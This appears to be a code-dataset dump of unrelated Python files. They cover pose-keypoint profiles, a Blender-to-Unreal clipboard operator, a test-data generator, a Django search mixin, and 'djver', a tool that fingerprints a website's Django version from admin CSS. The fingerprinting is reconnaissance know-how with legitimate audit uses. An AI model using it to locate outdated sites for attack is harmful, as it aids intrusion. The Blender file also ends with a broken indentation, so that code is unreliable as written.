        pelvis_keypoint_name=['Hip'],
        left_hip_keypoint_name=['LHip'],
        right_hip_keypoint_name=['RHip'],
        left_knee_keypoint_name=['LKnee'],
        right_knee_keypoint_name=['RKnee'],
        left_ankle_keypoint_name=['LFoot'],
        right_ankle_keypoint_name=['RFoot'])
class LegacyH36m13KeypointProfile3D(KeypointProfile3D):
  """Legacy Human3.6M 3D 13-keypoint profile."""

  def __init__(self):
    """Initializer."""
    central = LeftRightType.CENTRAL
    left = LeftRightType.LEFT
    right = LeftRightType.RIGHT
    # Multi-keypoint groups stand in for parts this profile lacks explicit
    # keypoints for (neck, spine, pelvis).
    shoulders = ['LShoulder', 'RShoulder']
    hips = ['LHip', 'RHip']
    super().__init__(
        name='LEGACY_3DH36M13',
        keypoint_names=[('Head', central),
                        ('LShoulder', left),
                        ('RShoulder', right),
                        ('LElbow', left),
                        ('RElbow', right),
                        ('LWrist', left),
                        ('RWrist', right),
                        ('LHip', left),
                        ('RHip', right),
                        ('LKnee', left),
                        ('RKnee', right),
                        ('LFoot', left),
                        ('RFoot', right)],
        offset_keypoint_names=['LHip'],
        scale_keypoint_name_pairs=[
            (hips, shoulders),
        ],
        segment_name_pairs=[(hips, shoulders),
                            (hips, ['LHip']),
                            (hips, ['RHip']), (['LHip'], ['LKnee']),
                            (['RHip'], ['RKnee']), (['LKnee'], ['LFoot']),
                            (['RKnee'], ['RFoot']),
                            (shoulders, ['Head']),
                            (shoulders, ['LShoulder']),
                            (shoulders, ['RShoulder']),
                            (['LShoulder'], ['LElbow']),
                            (['RShoulder'], ['RElbow']),
                            (['LElbow'], ['LWrist']), (['RElbow'], ['RWrist'])],
        head_keypoint_name=['Head'],
        neck_keypoint_name=shoulders,
        left_shoulder_keypoint_name=['LShoulder'],
        right_shoulder_keypoint_name=['RShoulder'],
        left_elbow_keypoint_name=['LElbow'],
        right_elbow_keypoint_name=['RElbow'],
        left_wrist_keypoint_name=['LWrist'],
        right_wrist_keypoint_name=['RWrist'],
        spine_keypoint_name=['LShoulder', 'RShoulder', 'LHip', 'RHip'],
        pelvis_keypoint_name=hips,
        left_hip_keypoint_name=['LHip'],
        right_hip_keypoint_name=['RHip'],
        left_knee_keypoint_name=['LKnee'],
        right_knee_keypoint_name=['RKnee'],
        left_ankle_keypoint_name=['LFoot'],
        right_ankle_keypoint_name=['RFoot'])
class LegacyMpii3dhp17KeypointProfile3D(KeypointProfile3D):
  """Legacy MPII-3DHP 3D 17-keypoint profile."""

  def __init__(self):
    """Initializer."""
    central = LeftRightType.CENTRAL
    left = LeftRightType.LEFT
    right = LeftRightType.RIGHT
    super().__init__(
        name='LEGACY_3DMPII3DHP17',
        keypoint_names=[('pelvis', central),
                        ('head', central),
                        ('neck', central),
                        ('head_top', central),
                        ('left_shoulder', left),
                        ('right_shoulder', right),
                        ('left_elbow', left),
                        ('right_elbow', right),
                        ('left_wrist', left),
                        ('right_wrist', right),
                        ('spine', central),
                        ('left_hip', left),
                        ('right_hip', right),
                        ('left_knee', left),
                        ('right_knee', right),
                        ('left_ankle', left),
                        ('right_ankle', right)],
        offset_keypoint_names=['pelvis'],
        scale_keypoint_name_pairs=[(['pelvis'], ['spine']),
                                   (['spine'], ['neck'])],
        segment_name_pairs=[(['pelvis'], ['spine']),
                            (['pelvis'], ['left_hip']),
                            (['pelvis'], ['right_hip']),
                            (['spine'], ['neck']),
                            (['left_hip'], ['left_knee']),
                            (['right_hip'], ['right_knee']),
                            (['left_knee'], ['left_ankle']),
                            (['right_knee'], ['right_ankle']),
                            (['neck'], ['head']),
                            (['neck'], ['left_shoulder']),
                            (['neck'], ['right_shoulder']),
                            (['head'], ['head_top']),
                            (['left_shoulder'], ['left_elbow']),
                            (['right_shoulder'], ['right_elbow']),
                            (['left_elbow'], ['left_wrist']),
                            (['right_elbow'], ['right_wrist'])],
        head_keypoint_name=['head'],
        neck_keypoint_name=['neck'],
        left_shoulder_keypoint_name=['left_shoulder'],
        right_shoulder_keypoint_name=['right_shoulder'],
        left_elbow_keypoint_name=['left_elbow'],
        right_elbow_keypoint_name=['right_elbow'],
        left_wrist_keypoint_name=['left_wrist'],
        right_wrist_keypoint_name=['right_wrist'],
        spine_keypoint_name=['spine'],
        pelvis_keypoint_name=['pelvis'],
        left_hip_keypoint_name=['left_hip'],
        right_hip_keypoint_name=['right_hip'],
        left_knee_keypoint_name=['left_knee'],
        right_knee_keypoint_name=['right_knee'],
        left_ankle_keypoint_name=['left_ankle'],
        right_ankle_keypoint_name=['right_ankle'])
class Std13KeypointProfile2D(KeypointProfile2D):
  """Standard 2D 13-keypoint profile.

  Profile `2DSTD13`: nose tip plus left/right shoulders, elbows, wrists,
  hips, knees, and ankles.
  """
  def __init__(self):
    """Initializer. All arguments to the base class are fixed constants
    describing this profile's topology."""
    super(Std13KeypointProfile2D, self).__init__(
        name='2DSTD13',
        # Keypoint names paired with their body-side tag.
        keypoint_names=[('NOSE_TIP', LeftRightType.CENTRAL),
                        ('LEFT_SHOULDER', LeftRightType.LEFT),
                        ('RIGHT_SHOULDER', LeftRightType.RIGHT),
                        ('LEFT_ELBOW', LeftRightType.LEFT),
                        ('RIGHT_ELBOW', LeftRightType.RIGHT),
                        ('LEFT_WRIST', LeftRightType.LEFT),
                        ('RIGHT_WRIST', LeftRightType.RIGHT),
                        ('LEFT_HIP', LeftRightType.LEFT),
                        ('RIGHT_HIP', LeftRightType.RIGHT),
                        ('LEFT_KNEE', LeftRightType.LEFT),
                        ('RIGHT_KNEE', LeftRightType.RIGHT),
                        ('LEFT_ANKLE', LeftRightType.LEFT),
                        ('RIGHT_ANKLE', LeftRightType.RIGHT)],
        # Keypoints used as the offset reference.
        offset_keypoint_names=['LEFT_HIP', 'RIGHT_HIP'],
        # Keypoint pairs whose distances define the scale.
        scale_keypoint_name_pairs=[(['LEFT_SHOULDER'], ['RIGHT_SHOULDER']),
                                   (['LEFT_SHOULDER'], ['LEFT_HIP']),
                                   (['LEFT_SHOULDER'], ['RIGHT_HIP']),
                                   (['RIGHT_SHOULDER'], ['LEFT_HIP']),
                                   (['RIGHT_SHOULDER'], ['RIGHT_HIP']),
                                   (['LEFT_HIP'], ['RIGHT_HIP'])],
        # Skeleton edges of the 13-point body graph.
        segment_name_pairs=[(['NOSE_TIP'], ['LEFT_SHOULDER']),
                            (['NOSE_TIP'], ['RIGHT_SHOULDER']),
                            (['LEFT_SHOULDER'], ['RIGHT_SHOULDER']),
                            (['LEFT_SHOULDER'], ['LEFT_ELBOW']),
                            (['RIGHT_SHOULDER'], ['RIGHT_ELBOW']),
                            (['LEFT_ELBOW'], ['LEFT_WRIST']),
                            (['RIGHT_ELBOW'], ['RIGHT_WRIST']),
                            (['LEFT_SHOULDER'], ['LEFT_HIP']),
                            (['RIGHT_SHOULDER'], ['RIGHT_HIP']),
                            (['LEFT_HIP'], ['RIGHT_HIP']),
                            (['LEFT_HIP'], ['LEFT_KNEE']),
                            (['RIGHT_HIP'], ['RIGHT_KNEE']),
                            (['LEFT_KNEE'], ['LEFT_ANKLE']),
                            (['RIGHT_KNEE'], ['RIGHT_ANKLE'])],
        # For each compatible profile name, the keypoint names in that
        # profile corresponding (in order) to this profile's 13 keypoints.
        compatible_keypoint_name_dict={
            '3DSTD16': [
                'HEAD', 'LEFT_SHOULDER', 'RIGHT_SHOULDER', 'LEFT_ELBOW',
                'RIGHT_ELBOW', 'LEFT_WRIST', 'RIGHT_WRIST', 'LEFT_HIP',
                'RIGHT_HIP', 'LEFT_KNEE', 'RIGHT_KNEE', 'LEFT_ANKLE',
                'RIGHT_ANKLE'
            ],
            '3DSTD13': [
                'HEAD', 'LEFT_SHOULDER', 'RIGHT_SHOULDER', 'LEFT_ELBOW',
                'RIGHT_ELBOW', 'LEFT_WRIST', 'RIGHT_WRIST', 'LEFT_HIP',
                'RIGHT_HIP', 'LEFT_KNEE', 'RIGHT_KNEE', 'LEFT_ANKLE',
                'RIGHT_ANKLE'
            ],
            'LEGACY_3DH36M17': [
                'Head', 'LShoulder', 'RShoulder', 'LElbow', 'RElbow', 'LWrist',
                'RWrist', 'LHip', 'RHip', 'LKnee', 'RKnee', 'LFoot', 'RFoot'
            ],
            'LEGACY_3DMPII3DHP17': [
                'head', 'left_shoulder', 'right_shoulder', 'left_elbow',
                'right_elbow', 'left_wrist', 'right_wrist', 'left_hip',
                'right_hip', 'left_knee', 'right_knee', 'left_ankle',
                'right_ankle'
            ],
        },
        # Named standard body parts; entries with several names map the part
        # to a group of keypoints (e.g. neck/pelvis/spine).
        head_keypoint_name=['NOSE_TIP'],
        neck_keypoint_name=['LEFT_SHOULDER', 'RIGHT_SHOULDER'],
        left_shoulder_keypoint_name=['LEFT_SHOULDER'],
        right_shoulder_keypoint_name=['RIGHT_SHOULDER'],
        left_elbow_keypoint_name=['LEFT_ELBOW'],
        right_elbow_keypoint_name=['RIGHT_ELBOW'],
        left_wrist_keypoint_name=['LEFT_WRIST'],
        right_wrist_keypoint_name=['RIGHT_WRIST'],
        spine_keypoint_name=[
            'LEFT_SHOULDER', 'RIGHT_SHOULDER', 'LEFT_HIP', 'RIGHT_HIP'
        ],
        pelvis_keypoint_name=['LEFT_HIP', 'RIGHT_HIP'],
        left_hip_keypoint_name=['LEFT_HIP'],
        right_hip_keypoint_name=['RIGHT_HIP'],
        left_knee_keypoint_name=['LEFT_KNEE'],
        right_knee_keypoint_name=['RIGHT_KNEE'],
        left_ankle_keypoint_name=['LEFT_ANKLE'],
        right_ankle_keypoint_name=['RIGHT_ANKLE'])
class LegacyCoco13KeypointProfile2D(Std13KeypointProfile2D):
  """Legacy COCO 2D 13-keypoint profile.

  This profile is the same as the `2DSTD13` profile, except the name.
  """
  def __init__(self):
    """Initializer."""
    super(LegacyCoco13KeypointProfile2D, self).__init__()
    # Override the name set by the parent initializer.
    self._name = 'LEGACY_2DCOCO13'
class LegacyH36m13KeypointProfile2D(KeypointProfile2D):
  """Legacy Human3.6M 2D 13-keypoint profile.

  Uses Human3.6M-style short names (LShoulder, RHip, LFoot, ...); the foot
  keypoints play the role of ankles.
  """
  def __init__(self):
    """Initializer. All arguments to the base class are fixed constants
    describing this profile's topology."""
    super(LegacyH36m13KeypointProfile2D,
          self).__init__(
              name='LEGACY_2DH36M13',
              # Keypoint names paired with their body-side tag.
              keypoint_names=[('Head', LeftRightType.CENTRAL),
                              ('LShoulder', LeftRightType.LEFT),
                              ('RShoulder', LeftRightType.RIGHT),
                              ('LElbow', LeftRightType.LEFT),
                              ('RElbow', LeftRightType.RIGHT),
                              ('LWrist', LeftRightType.LEFT),
                              ('RWrist', LeftRightType.RIGHT),
                              ('LHip', LeftRightType.LEFT),
                              ('RHip', LeftRightType.RIGHT),
                              ('LKnee', LeftRightType.LEFT),
                              ('RKnee', LeftRightType.RIGHT),
                              ('LFoot', LeftRightType.LEFT),
                              ('RFoot', LeftRightType.RIGHT)],
              # Keypoints used as the offset reference.
              offset_keypoint_names=['LHip', 'RHip'],
              # Keypoint pairs whose distances define the scale.
              scale_keypoint_name_pairs=[(['LShoulder'], ['RShoulder']),
                                         (['LShoulder'], ['LHip']),
                                         (['LShoulder'], ['RHip']),
                                         (['RShoulder'], ['LHip']),
                                         (['RShoulder'], ['RHip']),
                                         (['LHip'], ['RHip'])],
              # Skeleton edges of the 13-point body graph.
              segment_name_pairs=[(['Head'], ['LShoulder']),
                                  (['Head'], ['RShoulder']),
                                  (['LShoulder'], ['LElbow']),
                                  (['LElbow'], ['LWrist']),
                                  (['RShoulder'], ['RElbow']),
                                  (['RElbow'], ['RWrist']),
                                  (['LShoulder'], ['LHip']),
                                  (['RShoulder'], ['RHip']),
                                  (['LHip'], ['LKnee']), (['LKnee'], ['LFoot']),
                                  (['RHip'], ['RKnee']), (['RKnee'], ['RFoot']),
                                  (['LShoulder'], ['RShoulder']),
                                  (['LHip'], ['RHip'])],
              # For each compatible profile name, the keypoint names in that
              # profile corresponding (in order) to this profile's keypoints.
              compatible_keypoint_name_dict={
                  '3DSTD16': [
                      'HEAD', 'LEFT_SHOULDER', 'RIGHT_SHOULDER', 'LEFT_ELBOW',
                      'RIGHT_ELBOW', 'LEFT_WRIST', 'RIGHT_WRIST', 'LEFT_HIP',
                      'RIGHT_HIP', 'LEFT_KNEE', 'RIGHT_KNEE', 'LEFT_ANKLE',
                      'RIGHT_ANKLE'
                  ],
                  '3DSTD13': [
                      'HEAD', 'LEFT_SHOULDER', 'RIGHT_SHOULDER', 'LEFT_ELBOW',
                      'RIGHT_ELBOW', 'LEFT_WRIST', 'RIGHT_WRIST', 'LEFT_HIP',
                      'RIGHT_HIP', 'LEFT_KNEE', 'RIGHT_KNEE', 'LEFT_ANKLE',
                      'RIGHT_ANKLE'
                  ],
                  'LEGACY_3DH36M17': [
                      'Head', 'LShoulder', 'RShoulder', 'LElbow', 'RElbow',
                      'LWrist', 'RWrist', 'LHip', 'RHip', 'LKnee', 'RKnee',
                      'LFoot', 'RFoot'
                  ],
                  'LEGACY_3DMPII3DHP17': [
                      'head', 'left_shoulder', 'right_shoulder', 'left_elbow',
                      'right_elbow', 'left_wrist', 'right_wrist', 'left_hip',
                      'right_hip', 'left_knee', 'right_knee', 'left_ankle',
                      'right_ankle'
                  ],
              },
              # Named standard body parts; multi-name entries map a part to a
              # group of keypoints (e.g. neck/pelvis/spine).
              head_keypoint_name=['Head'],
              neck_keypoint_name=['LShoulder', 'RShoulder'],
              left_shoulder_keypoint_name=['LShoulder'],
              right_shoulder_keypoint_name=['RShoulder'],
              left_elbow_keypoint_name=['LElbow'],
              right_elbow_keypoint_name=['RElbow'],
              left_wrist_keypoint_name=['LWrist'],
              right_wrist_keypoint_name=['RWrist'],
              spine_keypoint_name=['LShoulder', 'RShoulder', 'LHip', 'RHip'],
              pelvis_keypoint_name=['LHip', 'RHip'],
              left_hip_keypoint_name=['LHip'],
              right_hip_keypoint_name=['RHip'],
              left_knee_keypoint_name=['LKnee'],
              right_knee_keypoint_name=['RKnee'],
              # Human3.6M "Foot" keypoints serve as the ankles.
              left_ankle_keypoint_name=['LFoot'],
              right_ankle_keypoint_name=['RFoot'])
def create_keypoint_profile_or_die(keypoint_profile_name):
  """Creates keypoint profile based on name.

  Args:
    keypoint_profile_name: A string for keypoint profile name.

  Returns:
    A keypoint profile class object.

  Raises:
    ValueError: If keypoint profile name is unsupported.
  """
  # Lambdas keep class lookup lazy, mirroring the original if-chain: no
  # profile class is touched unless its name is actually requested.
  factories = {
      '3DSTD16': lambda: Std16KeypointProfile3D(),
      '3DSTD13': lambda: Std13KeypointProfile3D(),
      'LEGACY_3DH36M17': lambda: LegacyH36m17KeypointProfile3D(),
      'LEGACY_3DH36M13': lambda: LegacyH36m13KeypointProfile3D(),
      'LEGACY_3DMPII3DHP17': lambda: LegacyMpii3dhp17KeypointProfile3D(),
      '2DSTD13': lambda: Std13KeypointProfile2D(),
      'LEGACY_2DCOCO13': lambda: LegacyCoco13KeypointProfile2D(),
      'LEGACY_2DH36M13': lambda: LegacyH36m13KeypointProfile2D(),
  }
  if keypoint_profile_name not in factories:
    raise ValueError('Unsupported keypoint profile name: `%s`.' %
                     str(keypoint_profile_name))
  return factories[keypoint_profile_name]()
| apache-2.0 | 7,232,078,692,394,039,000 | 41.027586 | 80 | 0.556059 | false | 3.58708 | false | false | false |
stilobique/UE4-Tools | controllers/data_buffer.py | 1 | 3448 | import bpy
import pyperclip
from math import degrees
class DataBuffer(bpy.types.Operator):
    """Copy position, rotation and scale of all selected objects to the
    clipboard as an Unreal Engine "Begin Map" text snippet.

    Fix: the original string assembly ended with a stray line-continuation
    backslash right before the ``else:`` branch, which is a SyntaxError.
    The concatenation is now parenthesized, which needs no backslashes.
    """
    bl_idname = "object.data_buffer"
    bl_label = "Paste information buffer"

    def execute(self, context):
        """Build the UE text for each selected object and copy it.

        Returns ``{'FINISHED'}`` on success, ``{'CANCELLED'}`` when the
        selection contains an invalid (None) entry.
        """
        objs = context.selected_objects
        string_data_prefixe = 'Begin Map \n'' Begin Level \n'
        string_data_suffixe = (' End Level\n''Begin Surface\n''End '
                               'Surface\n''End Map')
        string_data = ""
        for element in objs:
            if element is None:
                self.report({'WARNING'}, "Select an object(s).")
                return {'CANCELLED'}
            # Blender uses meters and a right-handed frame; the *100 factor
            # and the sign flips convert to UE centimeters/axis convention.
            position_x = str(round(element.location.x * 100, 2))
            position_y = str(round(element.location.y * -100, 2))
            position_z = str(round(element.location.z * 100, 2))
            rotation_pitch = str(round(degrees(element.rotation_euler.y), 2))
            rotation_yaw = str(round(degrees(element.rotation_euler.z), 2) * -1)
            rotation_roll = str(round(degrees(element.rotation_euler.x), 2))
            string_data += (
                ' Begin Actor '
                'Class=StaticMeshActor '
                'Name=' + element.name + ' '
                'Archetype=StaticMeshActor'
                '\'/Script/Engine.Default__StaticMeshActor\'\n'
                ' Begin Object Class=StaticMeshComponent '
                'Name=StaticMeshComponent0 '
                'ObjName=StaticMeshComponent0 '
                'Archetype=StaticMeshComponent'
                '\'/Script/Engine.Default__StaticMeshActor:StaticMeshComponent0'
                '\'\n'
                ' End Object\n'
                ' Begin Object '
                'Name=StaticMeshComponent0\n'
                ' StaticMesh=StaticMesh\'/Engine/EditorMeshes/EditorCube'
                '.EditorCube\' \n'
                ' RelativeLocation=(X=' + position_x + ',Y=' +
                position_y + ',Z=' + position_z + ')\n'
                ' RelativeScale3D=(X=' + str(round(element.scale.x, 2)) + ','
                'Y=' + str(round(element.scale.y, 2)) + ','
                'Z=' + str(round(element.scale.z, 2)) + ')\n'
                ' RelativeRotation=(Pitch=' + rotation_pitch + ',Yaw=' +
                rotation_yaw + ','
                'Roll=' + rotation_roll + ')\n'
                ' CustomProperties\n'
                ' End Object\n'
                ' StaticMeshComponent=StaticMeshComponent0\n'
                ' Components(0)=StaticMeshComponent0\n'
                ' RootComponent=StaticMeshComponent0\n'
                ' ActorLabel="' + element.name + '"\n'
                ' End Actor\n'
            )
        string_complete = (string_data_prefixe + string_data
                           + string_data_suffixe)
        pyperclip.copy(string_complete)
        print(string_complete)
        self.report({'INFO'}, "Data copied on your Buffer.")
        return {'FINISHED'}
def register():
    """Register the DataBuffer operator with Blender."""
    bpy.utils.register_class(DataBuffer)
def unregister():
    """Unregister the DataBuffer operator from Blender."""
    bpy.utils.unregister_class(DataBuffer)
if __name__ == "__main__":
register() | gpl-3.0 | -6,769,097,919,469,354,000 | 37.322222 | 114 | 0.49739 | false | 4.099881 | false | false | false |
AceSrc/datagon | datagon/generator/translator.py | 1 | 3802 | import parser
import random
result = ''  # accumulated generated output (space-separated tokens)
symbol = {}  # user-defined variable table: name -> int value
cnt = 0  # newline budget consumed by AddNewLine/CleanLine inside Translator
def Translator(ast):
    """Walk the parsed AST and return the generated test data as a string.

    Mutates the module-level ``result``/``symbol``/``cnt`` globals while
    translating and returns the accumulated ``result`` text.

    Fix: ``Mul`` and ``Sub`` previously performed *addition* (copy-paste
    bug); they now multiply/subtract as their names and the 'mul'/'sub'
    dispatch entries intend.
    """

    def PrintError(x):
        # Fatal: report and abort generation.
        print(x)
        exit(1)

    def PrintMsg(x):
        print(x)

    def Output(x):
        # Append one token to the generated output.
        global result
        result += str(x) + ' '

    def GetRandomInt(interval):
        """Resolve an int or [lo, hi] interval to a concrete int."""
        if isinstance(interval, str):
            PrintError('Error: ' + interval)
        if isinstance(interval, int):
            return interval
        if interval[0] > interval[1]:
            print('!!! Invaild Interval ')
            exit(1)
        rt = random.randint(interval[0], interval[1])
        return rt

    def AddPermutation(interval):
        # Emit a random permutation of 1..n.
        n = GetRandomInt(interval)
        p = [i for i in range(1, n + 1)]
        random.shuffle(p)
        global result
        for i in p:
            result += str(i) + ' '
        return None

    def Add(a, b):
        return GetRandomInt(a) + GetRandomInt(b)

    def Mul(a, b):
        # Fixed: was addition.
        return GetRandomInt(a) * GetRandomInt(b)

    def Sub(a, b):
        # Fixed: was addition.
        return GetRandomInt(a) - GetRandomInt(b)

    def AddWeight(n, interval):
        # Emit n random values drawn from interval.
        n = GetRandomInt(n)
        for i in range(0, n):
            Output(GetRandomInt(interval))

    def RepeatOutput(node):
        # params[0] is the repeat count; remaining params are re-emitted.
        times = TranslateNode(node.params[0], node)
        for i in range(0, times):
            TranslateArray(node)
            AddNewLine()

    def HandleFunction(node):
        """Dispatch a parser.Function node by its type name."""
        print('handling function: ' + node.type)
        print(node.params)
        cases = {
            'print': lambda x: Output(GetRandomInt(TranslateNode(x.params[0], x))),
            'add': lambda x: Add(TranslateNode(x.params[0], x), TranslateNode(x.params[1], x)),
            'sub': lambda x: Sub(TranslateNode(x.params[0], x), TranslateNode(x.params[1], x)),
            'mul': lambda x: Mul(TranslateNode(x.params[0], x), TranslateNode(x.params[1], x)),
            'permutation': lambda x: AddPermutation(TranslateNode(x.params[0], x)),
            'weight': lambda x: AddWeight(TranslateNode(x.params[0], x), TranslateNode(x.params[1], x)),
            'repeat': lambda x: RepeatOutput(x),
            'set': lambda x: SetVariableValue(x.params[0].name, TranslateNode(x.params[1], x))
        }
        return cases.get(node.type, lambda x: None)(node)

    def AddNewLine():
        # Emit a newline only while the budget allows it.
        global cnt
        cnt += 1
        if cnt <= 0:
            return
        cnt -= 1
        global result
        result += '\n'

    def CleanLine():
        print("Clean")
        global cnt
        cnt -= 1

    def HandleFormat(node):
        """Dispatch a parser.Format node (newline/clearline directives)."""
        print("Handling Format: " + node.value)
        cases = {
            'newline': lambda x: AddNewLine(),
            'clearline': lambda x: CleanLine(),
        }
        return cases.get(node.value, lambda x: None)(node)

    def GetVariableValue(name):
        # Unknown variables evaluate to their own name (later PrintError'd).
        return symbol.get(name, name)

    def SetVariableValue(name, value):
        value = GetRandomInt(value)
        symbol[name] = value
        print('Set variable: ' + str(name) + ' = ' + str(symbol[name]))
        return symbol[name]

    def TranslateArray(node):
        for x in node.params:
            TranslateNode(x, node)

    def TranslateNode(node, parent):
        """Dispatch a node by its parser class."""
        cases = {
            parser.Function: lambda x: HandleFunction(x),
            parser.Number: lambda x: x.value,
            parser.Interval:
                lambda x: [TranslateNode(x.left, x) + x.leftoffset, TranslateNode(x.right, x) + x.rightoffset],
            parser.String: lambda x: GetVariableValue(x.name),
            # NOTE(review): SetVariableValue takes (name, value); this
            # one-arg call would raise TypeError if a bare Setvar node is
            # ever dispatched here -- confirm against the parser.
            parser.Setvar: lambda x: SetVariableValue(x),
            parser.Program: lambda x: TranslateArray(x),
            parser.Format: lambda x: HandleFormat(x),
        }
        return cases.get(node.__class__, lambda x: None)(node)

    TranslateArray(ast)
    return result
| mit | 9,119,672,105,469,806,000 | 29.66129 | 111 | 0.553919 | false | 3.779324 | false | false | false |
sesh/djver | djver/djver.py | 1 | 6137 | #!/usr/bin/env python
"""
djver.
Usage:
djver.py [<url>] [--static-path=<static-path>] [--find-diffs] [--verbose]
Options:
--static-path=<static-path> URL path to the site's static files [default: /static/].
--find-diffs Attempt to find differences between the known versions of Django
--verbose Turn on verbose logging
"""
import os
import sys
import subprocess
import shutil
import difflib
import requests
from docopt import docopt
try:
from urlparse import urljoin
except ImportError:
from urllib.parse import urljoin
try:
from packaging.version import parse
except:
def parse(version):
return None
# Cache of fetched page bodies keyed by URL (only 200 responses are stored).
RESPONSE_CACHE = {}

THIRD_PARTY_CSS = [
    # Third party apps, might disguise version numbers
    ('django-flat-theme, or Django 1.9', 'fonts.css', 'Roboto'),
    ('django-suit', 'forms.css', 'Django Suit'),
]

# (version-range label, admin static file, CSS fragment unique to that range)
# checked in order from newest to oldest by check_version().
ADMIN_CHANGES = [
    ('2.1.2-2.1', 'css/base.css', 'background: url(../img/icon-viewlink.svg) 0 1px no-repeat;'),
    ('2.0.9-2.0', 'css/base.css', 'textarea:focus, select:focus, .vTextField:focus {'),
    ('1.11.16-1.11', 'css/base.css', 'background-position: right 7px center;'),
    ('1.10.8-1.10', 'css/base.css', 'color: #000;'),
    ('1.9.13-1.9', 'css/widgets.css', 'margin-left: 7px;'),
    ('1.8.19-1.8.2', 'css/forms.css', 'clear: left;'),
    ('1.8.1', 'css/widgets.css', '.related-widget-wrapper {'),
    ('1.8', 'css/widgets.css', 'opacity: 1;'),
    ('1.7.11-1.7', 'css/base.css', '#branding a:hover {'),
    ('1.6.11-1.6', 'css/widgets.css', 'width: 360px;'),
    ('1.5.12-1.5', 'css/widgets.css', '.url a {'),
    ('1.4.22-1.4.1', 'css/widgets.css', '.inline-group .aligned .selector .selector-filter label {'),
]
def check_str(url, search_str, verbose=False):
    """Return True when the page at ``url`` contains ``search_str``.

    Bodies are memoised in RESPONSE_CACHE (successful fetches only); all
    spaces are stripped from both the body and the needle before matching.
    """
    cached = url in RESPONSE_CACHE
    if cached:
        content = RESPONSE_CACHE[url]
        status_code = 200
    else:
        resp = requests.get(url)
        status_code = resp.status_code
        content = resp.content.decode().replace(' ', '')

    if verbose:
        print('[{}] {}'.format(status_code, url))

    if status_code == 200:
        RESPONSE_CACHE[url] = content

    return search_str.replace(' ', '') in content
def check_version(base_url, static_path, verbose=False):
    """Probe the site's admin CSS and return the first matching
    version-range label from ADMIN_CHANGES, or None if nothing matches."""
    if not base_url.startswith('http'):
        base_url = 'http://' + base_url

    for version, path, string in ADMIN_CHANGES:
        target = base_url + static_path + 'admin/' + path
        if check_str(target, string, verbose):
            return version
def find_diffs():
    """Download every released Django admin CSS file and print, for each
    version range, a CSS line unique to it (rows for ADMIN_CHANGES)."""
    # All non-prerelease Django versions newer than 1.3.x, newest first.
    response = requests.get('https://pypi.org/pypi/Django/json')
    versions = [parse(v) for v in response.json()['releases'].keys()]
    versions = sorted(versions, reverse=True)
    print(versions)
    versions = [str(v) for v in versions if v.is_prerelease == False and v > parse("1.3.99")]
    # we only care about 1.4 and above
    # favour files _not_ found in django-flat-theme
    files = [
        # admin js
        # "js/SelectBox.js",
        # "js/actions.js",
        # "js/actions.min.js",
        # "js/calendar.js",
        # "js/collapse.js",
        # "js/collapse.min.js",
        # "js/core.js",
        # "js/inlines.js",
        # "js/inlines.min.js",
        # "js/jquery.init.js",
        # "js/prepopulate.js",
        # "js/prepopulate.min.js",
        # "js/timeparse.js",
        # "js/urlify.js",
        # admin css
        'css/widgets.css', 'css/base.css', 'css/forms.css', 'css/login.css', 'css/dashboard.css',
        # 'css/ie.css', # removed in 1.9.x
    ]
    # Download each version's admin files into files/<version>/ (cached on
    # disk; only missing files are fetched).
    for v in versions:
        os.makedirs('files/{}/css/'.format(v), exist_ok=True)
        os.makedirs('files/{}/js/'.format(v), exist_ok=True)
        for fn in files:
            full_path = 'files/{}/{}'.format(v, fn)
            if not os.path.exists(full_path):
                repo = 'https://raw.githubusercontent.com/django/django/'
                url = '{}{}/django/contrib/admin/static/admin/{}'.format(repo, v, fn)
                # Pre-1.4 releases kept admin assets under media/ instead.
                if v.startswith('1.3'):
                    url = '{}{}/django/contrib/admin/media/{}'.format(repo, v, fn)
                response = requests.get(url)
                print('[{}] {}'.format(response.status_code, url))
                with open(full_path, 'wb') as f:
                    f.write(response.content)
    # Walk adjacent version pairs; a line added in v1 (vs. the older v2),
    # unique within its file, fingerprints every version since the last
    # printed row (accumulated in matched_versions).
    matched_versions = []
    for i, v1 in enumerate(versions[:-1]):
        matched_versions.append(v1)
        v2 = versions[i + 1]
        new_line = None
        for f in files:
            f1 = open('files/{}/{}'.format(v1, f)).read()
            f2 = open('files/{}/{}'.format(v2, f)).read()
            # compare f2 to f1 so that we see _added_ lines
            diff = difflib.ndiff(f2.splitlines(), f1.splitlines())
            for line in diff:
                if line.startswith('+ ') and '/*' not in line:
                    line = line[2:]
                    # ensure this line is unique within the file
                    if f1.count(line) == 1:
                        # we also want to make sure that it doesn't appear in any _older_ versions
                        for v in versions[i + 1:]:
                            f3 = open('files/{}/{}'.format(v, f)).read()
                            if line in f3:
                                break
                        # NOTE(review): new_line is assigned even when the
                        # loop above broke (line found in an older version);
                        # confirm whether the break was meant to skip this.
                        new_line = line
            if new_line:
                if len(matched_versions) > 1:
                    print("('{}', '{}', '{}'),".format('-'.join([matched_versions[0], matched_versions[-1]]), f, new_line.strip()))
                else:
                    print("('{}', '{}', '{}'),".format(matched_versions[0], f, new_line.strip()))
                matched_versions = []
                break
def djver():
    """Command-line entry point: parse docopt arguments and dispatch."""
    args = docopt(__doc__, version='djver 2.0.0')

    if args['--find-diffs']:
        find_diffs()
        return

    if args['<url>']:
        detected = check_version(
            args['<url>'], args['--static-path'], args['--verbose'])
        if detected:
            print(detected)
        else:
            print('Unable to detect version.')
# Allow running as a standalone script: `python djver.py <url>`.
if __name__ == '__main__':
    djver()
| mit | 6,160,630,217,541,258,000 | 31.994624 | 131 | 0.536093 | false | 3.455518 | false | false | false |
pythonbyexample/PBE | dbe/classviews/edit_custom.py | 1 | 5732 | from django.forms import formsets
from django.contrib import messages
from django.db.models import Q
from detail import *
from edit import *
from dbe.shared.utils import *
class SearchFormViewMixin(BaseFormView):
    """Form-view mixin that also binds the form from GET query data."""
    # GET keys that never count as search input (e.g. pagination).
    ignore_get_keys = ["page"]
    def get_form_kwargs(self):
        """ Returns the keyword arguments for instantiating the form. """
        r = self.request
        kwargs = dict(initial=self.get_initial())
        if r.method in ("POST", "PUT"):
            kwargs.update(dict(data=r.POST, files=r.FILES))
        elif r.GET:
            # do get form processing if there's get data that's not in ignore list
            if [k for k in r.GET.keys() if k not in self.ignore_get_keys]:
                kwargs.update(dict(data=r.GET))
        return kwargs
    def get(self, request):
        # Bind the form from GET data; on valid input run the search hook.
        form = self.get_form()
        if self.request.GET:
            if form.is_valid():
                # NOTE(review): process_form is not defined here; subclasses
                # appear to be expected to provide it -- confirm.
                self.process_form(form)
            else:
                return self.form_invalid(form)
        return self.render_to_response(self.get_context_data(form=form))
